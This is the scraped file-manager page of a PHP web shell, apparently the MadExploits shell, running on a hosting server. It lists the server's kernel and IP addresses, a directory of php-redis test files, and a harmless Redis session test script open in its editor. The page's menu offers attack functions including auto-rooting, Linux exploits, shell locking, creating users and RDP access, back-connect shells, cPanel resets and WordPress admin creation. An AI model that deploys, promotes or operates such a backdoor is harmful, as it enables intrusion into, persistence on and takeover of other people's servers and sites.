Linux business72.web-hosting.com 4.18.0-553.lve.el8.x86_64 #1 SMP Mon May 27 15:27:34 UTC 2024 x86_64
LiteSpeed
: 162.0.229.97 | : 13.58.101.151
Cant Read [ /etc/named.conf ]
8.1.30
temmmp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
opt /
alt /
tests /
alt-php82-pecl-redis_5.3.7-5.el8 /
tests /
[ HOME SHELL ]
Name
Size
Permission
Action
RedisArrayTest.php
19.86
KB
-rw-r--r--
RedisClusterTest.php
29.05
KB
-rw-r--r--
RedisSentinelTest.php
2.58
KB
-rw-r--r--
RedisTest.php
272.24
KB
-rw-r--r--
TestRedis.php
3.3
KB
-rw-r--r--
TestSuite.php
9.5
KB
-rw-r--r--
getSessionData.php
560
B
-rw-r--r--
make-cluster.sh
5.06
KB
-rw-r--r--
mkring.sh
731
B
-rw-r--r--
regenerateSessionId.php
1.8
KB
-rw-r--r--
startSession.php
1.02
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : startSession.php
<?php error_reporting(E_ERROR | E_WARNING); $redisHost = $argv[1]; $saveHandler = $argv[2]; $sessionId = $argv[3]; $sleepTime = $argv[4]; $maxExecutionTime = $argv[5]; $lock_retries = $argv[6]; $lock_expire = $argv[7]; $sessionData = $argv[8]; $sessionLifetime = $argv[9]; if (empty($redisHost)) { $redisHost = 'tcp://localhost:6379'; } ini_set('session.save_handler', $saveHandler); ini_set('session.save_path', $redisHost); ini_set('max_execution_time', $maxExecutionTime); ini_set('redis.session.lock_retries', $lock_retries); ini_set('redis.session.lock_expire', $lock_expire); ini_set('session.gc_maxlifetime', $sessionLifetime); if (isset($argv[10])) { ini_set('redis.session.locking_enabled', $argv[10]); } if (isset($argv[11])) { ini_set('redis.session.lock_wait_time', $argv[11]); } session_id($sessionId); $sessionStartSuccessful = session_start(); sleep($sleepTime); if (!empty($sessionData)) { $_SESSION['redis_test'] = $sessionData; } session_write_close(); echo $sessionStartSuccessful ? 'SUCCESS' : 'FAILURE';
Close